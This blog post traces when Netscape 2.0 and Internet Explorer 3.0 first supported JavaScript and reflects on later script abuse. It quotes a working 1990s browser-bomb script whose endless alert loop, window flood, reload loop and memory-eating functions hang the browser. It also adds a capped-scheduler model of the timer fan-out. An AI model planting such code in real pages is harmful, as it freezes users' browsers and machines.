The Origins of Scripting Web Vulnerabilities in our Browsers
I was thinking about the current situation we are experiencing with Web vulnerabilities, specifically those involving scripting and JavaScript. So I searched for when our browsers first started to incorporate JavaScript and found the following:
- Netscape 2.0 was the first version of Netscape to have JavaScript support. It was released in March 1996: http://wp.netscape.com/eng/mozilla/2.0/relnotes/windows-2.0.html
- “Netscape version 2.0 introduced a bevy of must-have breakthrough features (frames, Java, Javascript and Plug-ins) which helped distance it from the pack…”
http://www.eskimo.com/~bloo/indexdot/history/netscape.htm
The following slides have good background information on the JavaScript implementation:
http://www.geom.uiuc.edu/~slevy/si/u_pkg_java102/docs/javaone/industry/JavaScri.pdf
On the Internet Explorer side, it was IE 3.0, released in August 1996, that incorporated JavaScript. Just as important, Microsoft also included VBScript.
“Version 3 included Internet Mail and News 1.0 and the Windows Address Book. It also brought the browser much closer to the bar that had been set by Netscape, including the support of Netscape’s plugins technology (NPAPI), ActiveX, frames, and a reverse-engineered version of JavaScript named JScript. Later, Microsoft NetMeeting and Windows Media Player were integrated into the product and thus helper applications became not as necessary as they once were. Cascading Style Sheets (CSS) were also introduced with version 3 of Internet Explorer.” – http://en.wikipedia.org/wiki/History_of_Internet_Explorer
It wasn’t long after this that people found ways to abuse JavaScript:
[SCRIPT LANGUAGE="JavaScript"]
function AnnoyingButton()
{
    while (true)
        window.alert("We have taken your Netscape session hostage. Now give us your money, the girl and everything else you got or we're going to break your legs.")
}

// Keep opening windows over and over again
function WindowBomb()
{
    var iCounter = 0 // dummy counter
    while (true)
    {
        window.open("http://www.netscape.com","CRASHING" + iCounter,"width=1,height=1,resizable=no")
        iCounter++
    }
}

// Not as interesting as the other bombs, but this one forces the user to
// stay at the current page. User cannot switch to another page, or click
// stop to stop the reloading.
function ReloadBomb()
{
    history.go(0) // reload this page
    window.setTimeout('ReloadBomb()',1) // tell netscape to hit this function
                                        // every millisecond =)
}

// Not a very interesting bomb, it does nothing really :>
function WhileLoopLock()
{
    while (true){}
}

var szEatMemory = "GOBBLEGOBBLE" // our string to consume our memory

// Now this function EatMemoryInTime is an interesting one that could be
// placed on a timer for maximum nastiness :> I have been able to get
// up to 4Megs consumed by Netscape forcing my machine to crawl =)
// AND it's time driven! No while loops here!
function EatMemoryInTime()
{
    szEatMemory = szEatMemory + szEatMemory // keep appending
    window.status = "String Length is: " + szEatMemory.length // report size
    window.setTimeout('EatMemoryInTime()',1); // tell netscape to hit this function
}

var iNumberOfIterations = 0;

// The Timeout bomb sets up 4 timers which then call itself again, and again
// watch the status bar to see how many times this function gets called.
function TimeBomb()
{
    window.status = "TimeBomb has been executed: " + iNumberOfIterations++ + " times";
    window.setTimeout('TimeBomb()',1000);
    window.setTimeout('TimeBomb()',1000);
    window.setTimeout('TimeBomb()',1000);
    window.setTimeout('TimeBomb()',1000);
}
[/SCRIPT]
The above is a script from around that time which chews up CPU and memory, forcing you to do a hard reset in Windows 95.
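The fan-out in `TimeBomb()` above, modelled on a virtual clock as an added example (not part of the original script or post): every call queues four more, so pending timers quadruple each second, while a cap on pending timers per page holds the queue flat. `VirtualScheduler`, `maxPending` and `runTimeBomb` are hypothetical names, and the cap is an illustrative policy, not any browser's actual behaviour.

```javascript
// Added example. VirtualScheduler, maxPending and runTimeBomb are hypothetical
// names; the cap is an illustrative policy, not a real browser's behaviour.
class VirtualScheduler {
  constructor(maxPending = Infinity) {
    this.now = 0;                 // virtual clock, in ms
    this.queue = [];              // pending timers: { due, fn }
    this.maxPending = maxPending; // budget for timers waiting to fire
    this.rejected = 0;            // requests refused by the budget
  }

  // Stand-in for window.setTimeout that refuses work once the budget is spent.
  setTimeout(fn, delayMs) {
    if (this.queue.length >= this.maxPending) {
      this.rejected++;
      return false;
    }
    this.queue.push({ due: this.now + delayMs, fn });
    return true;
  }

  // Jump to the earliest due time and run every timer due at that instant.
  tick() {
    if (this.queue.length === 0) return 0;
    const due = this.queue.reduce((m, t) => Math.min(m, t.due), Infinity);
    const ready = this.queue.filter((t) => t.due === due);
    this.queue = this.queue.filter((t) => t.due !== due);
    this.now = due;
    for (const t of ready) t.fn();
    return ready.length;
  }
}

// Same shape as TimeBomb(): each call re-arms itself four times, 1000 ms out.
function runTimeBomb(scheduler, rounds) {
  let calls = 0;
  const timeBomb = () => {
    calls++;
    for (let i = 0; i < 4; i++) scheduler.setTimeout(timeBomb, 1000);
  };
  timeBomb(); // the first call, e.g. from a button handler
  const pending = [scheduler.queue.length];
  for (let r = 0; r < rounds; r++) {
    scheduler.tick();
    pending.push(scheduler.queue.length);
  }
  return { calls, pending, rejected: scheduler.rejected };
}
console.log("no budget:", runTimeBomb(new VirtualScheduler(), 5).pending);
console.log("budget 8: ", runTimeBomb(new VirtualScheduler(8), 5).pending);
```

Without a budget the queue reaches 4096 pending timers after five virtual seconds; with a budget of 8 it never exceeds 8, and the refused requests are counted so a page that hits the cap can be flagged.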
And so, over 10 years later, scripting, which was designed to enhance our web experience, is still being abused today, but in very different ways that serve monetary gain for malicious purposes.
Maybe it's time we re-architect our browsers and rethink how we should experience the web all over again?